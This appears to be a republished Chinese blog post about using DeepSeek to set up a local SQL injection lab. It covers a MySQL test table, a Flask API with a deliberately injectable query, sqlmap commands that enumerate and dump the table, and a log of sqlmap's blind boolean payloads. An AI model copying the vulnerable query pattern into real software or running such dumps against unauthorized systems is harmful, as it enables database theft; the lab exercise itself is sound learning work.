网络安全-使用DeepSeek来获取sqlmap的攻击payload

devtools/2025/3/13 5:05:02/

文章目录

  • 概述
  • DeepSeek使用
  • 创建示例数据库
  • 创建API
  • 测试sqlmap
  • 部分日志
  • 参考

概述

今天来使用DeepSeek做安全测试,看看在有思路的情况下实现的快不快。

DeepSeek使用

我有一个思路,想要测试sqlmap工具如何dump数据库的:
连接mysql数据库,创建测试库、表,表至少包含整型、字符型列,插入示例数据
使用Python Flask编写一个API查询数据库并返回内容
使用sqlmap攻击该API
查看API日志
请优化我的思路,并给出相关的代码

在这里插入图片描述

创建示例数据库

-- 创建测试数据库
CREATE DATABASE sqlmap_test;-- 创建包含多种数据类型的表
USE sqlmap_test;
CREATE TABLE users (id INT PRIMARY KEY AUTO_INCREMENT,username VARCHAR(50),email VARCHAR(100),age INT,created_at DATETIME DEFAULT CURRENT_TIMESTAMP,profile TEXT,is_admin BOOLEAN DEFAULT FALSE
);-- 插入测试数据
INSERT INTO users (username, email, age, profile, is_admin) VALUES
('admin', 'admin@example.com', 30, 'System Administrator', TRUE),
('user1', 'user1@test.com', 25, 'Regular user profile', FALSE),
('test_user', 'test@domain.com', 28, 'Another test user', FALSE);

创建API

# app.py
import json
from flask import Flask, request, jsonify
import pymysql
from datetime import datetime
import logging
from logging.handlers import RotatingFileHandler
from setting import *app = Flask(__name__)# 配置数据库连接
db_config = {"host": DB_HOST,"user": DB_USER,"password": DB_PASSWORD,"db": DB_NAME,"port": DB_PORT,"charset": "utf8mb4","cursorclass": pymysql.cursors.DictCursor
}# 配置日志系统
def setup_logger():# 清除默认处理程序app.logger.handlers.clear()# 统一日志格式formatter = logging.Formatter('[%(asctime)s] %(levelname)s in %(module)s: %(message)s')# 访问日志配置access_handler = RotatingFileHandler('access.log',maxBytes=1024 * 1024,backupCount=5,delay=True  # 延迟文件打开直到实际写入)access_handler.setFormatter(formatter)access_handler.setLevel(logging.INFO)app.logger.addHandler(access_handler)app.logger.setLevel(logging.INFO)# SQL日志配置(独立logger)sql_handler = RotatingFileHandler('sql.log',maxBytes=1024 * 1024,backupCount=5,delay=True)sql_handler.setFormatter(formatter)sql_handler.setLevel(logging.INFO)sql_logger = logging.getLogger('sql')sql_logger.propagate = False  # 禁止传播到根loggersql_logger.setLevel(logging.INFO)sql_logger.addHandler(sql_handler)# 确保在应用初始化后配置日志
setup_logger()def get_db_connection():return pymysql.connect(**db_config)@app.route('/users', methods=['GET'])
def get_users():search = request.args.get('search', '')# 强制立即刷新访问日志app.logger.info(f"Access: {request.method} {request.path} - Params: {dict(request.args)}")app.logger.handlers[0].flush()conn = get_db_connection()try:with conn.cursor() as cursor:# 存在漏洞的查询query = f"SELECT * FROM users WHERE username = '{search}'"# 记录SQL并强制刷新sql_logger = logging.getLogger('sql')sql_logger.info(f"EXECUTE SQL: {query}")sql_logger.handlers[0].flush()cursor.execute(query)results = cursor.fetchall()# 转换datetime为字符串for row in results:if 'created_at' in row and isinstance(row['created_at'], datetime):row['created_at'] = row['created_at'].isoformat()app.logger.info(json.dumps(results), exc_info=True)return jsonify(results)except pymysql.Error as e:# 记录完整错误信息error_msg = f"Database error ({e.args[0]}): {e.args[1]}"app.logger.error(error_msg, exc_info=True)app.logger.handlers[0].flush()return jsonify({"error": "Database error"})except Exception as e:app.logger.error(f"Unexpected error: {str(e)}", exc_info=True)app.logger.handlers[0].flush()return jsonify({"error": "Server error"})finally:if 'conn' in locals():conn.close()if __name__ == '__main__':# 禁用重载器以避免重复日志app.run(host='0.0.0.0', port=5000, debug=False, use_reloader=False)

运行后访问

http://127.0.0.1:5000/users?search=test_user

结果如下:
在这里插入图片描述

测试sqlmap

python sqlmap.py -u "http://localhost:5000/users?search=test_user" --technique=B --threads 8 -dbs --batch
python sqlmap.py -u "http://localhost:5000/users?search=test_user" --technique=B --threads 8 -D sqlmap_test --tables --batch
python sqlmap.py -u "http://localhost:5000/users?search=test_user" --technique=B --threads 8 -D sqlmap_test -T users --columns --batch
python sqlmap.py -u "http://localhost:5000/users?search=test_user" --technique=B --threads 8 -D sqlmap_test -T users -C id,username,is_admin -dump --dump-format csv --batch

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
整体来说,实现的还挺快的,只有API实现时微调了一下日志和响应码。
ps:话说我只是测试下DeepSeek,sqlmap咋还出错了,两个test_user是什么鬼…

部分日志

[2025-03-01 21:55:51,918] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>51 AND 'FFDM'='FFDM'
[2025-03-01 21:55:54,058] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>54 AND 'FFDM'='FFDM'
[2025-03-01 21:55:54,139] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>52 AND 'FFDM'='FFDM'
[2025-03-01 21:55:56,258] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>53 AND 'FFDM'='FFDM'
[2025-03-01 21:55:56,343] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>51 AND 'FFDM'='FFDM'
[2025-03-01 21:55:59,600] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>48 AND 'FFDM'='FFDM'
[2025-03-01 21:55:59,682] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>9 AND 'FFDM'='FFDM'
[2025-03-01 21:56:01,814] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>64 AND 'FFDM'='FFDM'
[2025-03-01 21:56:01,819] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>64 AND 'FFDM'='FFDM'
[2025-03-01 21:56:01,828] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>64 AND 'FFDM'='FFDM'
[2025-03-01 21:56:01,828] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>64 AND 'FFDM'='FFDM'
[2025-03-01 21:56:01,829] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>64 AND 'FFDM'='FFDM'
[2025-03-01 21:56:01,898] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>96 AND 'FFDM'='FFDM'
[2025-03-01 21:56:04,070] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>96 AND 'FFDM'='FFDM'
[2025-03-01 21:56:04,070] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>96 AND 'FFDM'='FFDM'
[2025-03-01 21:56:04,074] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>112 AND 'FFDM'='FFDM'
[2025-03-01 21:56:04,074] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>96 AND 'FFDM'='FFDM'
[2025-03-01 21:56:04,074] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>96 AND 'FFDM'='FFDM'
[2025-03-01 21:56:04,167] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>112 AND 'FFDM'='FFDM'
[2025-03-01 21:56:06,190] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>112 AND 'FFDM'='FFDM'
[2025-03-01 21:56:06,190] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>104 AND 'FFDM'='FFDM'
[2025-03-01 21:56:06,190] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>112 AND 'FFDM'='FFDM'
[2025-03-01 21:56:06,197] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>112 AND 'FFDM'='FFDM'
[2025-03-01 21:56:06,266] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>104 AND 'FFDM'='FFDM'
[2025-03-01 21:56:06,284] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>104 AND 'FFDM'='FFDM'
[2025-03-01 21:56:08,317] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>104 AND 'FFDM'='FFDM'
[2025-03-01 21:56:08,317] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>104 AND 'FFDM'='FFDM'
[2025-03-01 21:56:08,318] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>100 AND 'FFDM'='FFDM'
[2025-03-01 21:56:08,372] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>100 AND 'FFDM'='FFDM'
[2025-03-01 21:56:08,406] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>108 AND 'FFDM'='FFDM'
[2025-03-01 21:56:08,408] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>108 AND 'FFDM'='FFDM'
[2025-03-01 21:56:10,575] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>98 AND 'FFDM'='FFDM'
[2025-03-01 21:56:10,575] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>106 AND 'FFDM'='FFDM'
[2025-03-01 21:56:10,575] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>98 AND 'FFDM'='FFDM'
[2025-03-01 21:56:10,575] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>110 AND 'FFDM'='FFDM'
[2025-03-01 21:56:10,576] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>108 AND 'FFDM'='FFDM'
[2025-03-01 21:56:10,670] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>97 AND 'FFDM'='FFDM'
[2025-03-01 21:56:12,724] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>109 AND 'FFDM'='FFDM'
[2025-03-01 21:56:12,738] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>99 AND 'FFDM'='FFDM'
[2025-03-01 21:56:12,739] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>110 AND 'FFDM'='FFDM'
[2025-03-01 21:56:12,740] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>105 AND 'FFDM'='FFDM'
[2025-03-01 21:56:12,838] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>109 AND 'FFDM'='FFDM'

参考

腾讯元宝
sqlmap


http://www.ppmy.cn/devtools/166680.html

相关文章

音频进阶学习十九——逆系统(简单进行回声消除)

音频进阶学习十九——逆系统(简单进行回声消除)

文章目录 前言一、可逆系统1.定义2.解卷积3.逆系统恢复原始信号过程4.逆系统与原系统的零极点关系 二、使用逆系统去除回声获取原信号的频谱原系统和逆系统幅频响应和相频响应使用逆系统恢复原始信号整体代码如下 总结 前言 在上一篇音频进阶学习十八——幅频响应相同系统、全…
阅读更多...
C# 委托中 Invoke/BeginInvoke/EndInvoke和DynamicInvoke 方法

C# 委托中 Invoke/BeginInvoke/EndInvoke和DynamicInvoke 方法

总目录 前言 在C#中,委托(Delegate)提供了多种调用方式,包括 Invoke、BeginInvoke、EndInvoke 和 DynamicInvoke。每种调用方式都有其特定的用途和适用场景。下面将详细介绍这些方法的区别与联系。 一、 Invoke方法 1. 定义 In…
阅读更多...
【从零开始学习计算机科学】操作系统(二)进程与线程

【从零开始学习计算机科学】操作系统(二)进程与线程

【从零开始学习计算机科学】操作系统(二)进程与线程 进程PCB进程状态执行模式进程的创建进程的切换进程的撤销进程的阻塞和唤醒进程管理1,写时复制(写时拷贝)2,线程池3,套接字(Socket)4,远程过程调用5,远程方法调用线程进程 进程这个概念体现在并发执行的程序模型中…
阅读更多...
Go语言Viper配置详解:conf库优雅解析实战

Go语言Viper配置详解:conf库优雅解析实战

在现代软件开发中,配置文件是不可或缺的一部分。无论是 YAML、JSON 还是 TOML,如何高效地将这些格式解析到 Go 结构体中,同时支持动态更新,一直是开发者的痛点。好消息是,基于 Viper 封装的 conf 库提供了一个简洁而强…
阅读更多...
正则表达式(2)匹配规则

正则表达式(2)匹配规则

正则表达式的匹配规则定义了如何识别字符串中的特定模式。这些规则包括字符类匹配、元字符匹配、数量词、字符转义和分组。 字符类匹配 字符类匹配允许你指定一个字符集合,并匹配该集合中的任意单个字符。这是通过方括号 [] 来实现的。 简单字符类:[abc…
阅读更多...
如何在 React 中实现错误边界?

如何在 React 中实现错误边界?

在 React 中实现错误边界 错误边界是 React 提供的一种机制,用于捕获子组件树中的 JavaScript 错误,并展示回退 UI。它可以帮助开发者更好地处理错误,提升用户体验。本文将详细介绍如何在 React 中实现错误边界,包括其工作原理、…
阅读更多...
git subtree更新子仓库的方式

git subtree更新子仓库的方式

在使用 git subtree 管理的仓库中&#xff0c;子仓库的更新可以通过以下步骤完成&#xff1a; 1. 更新子仓库到主仓库 如果子仓库有新的更新&#xff0c;可以将这些更新拉取到主仓库中&#xff1a; git subtree pull --prefix<子仓库路径> <子仓库地址> <分支…
阅读更多...
c#面试题整理4

c#面试题整理4

1.stirng str"",string strnull&#xff0c;俩者有何区别 空字符串占有存储控件&#xff0c;null不占用 2.class与struct的异同 异同class 可继承 引用类型 1.都可以定义方法字段 2.都可实例化&#xff0c;与类的使用几乎一样 struct 不可继承 值类型 只能声明带…
阅读更多...
最新文章

Copyright @ 2022~2023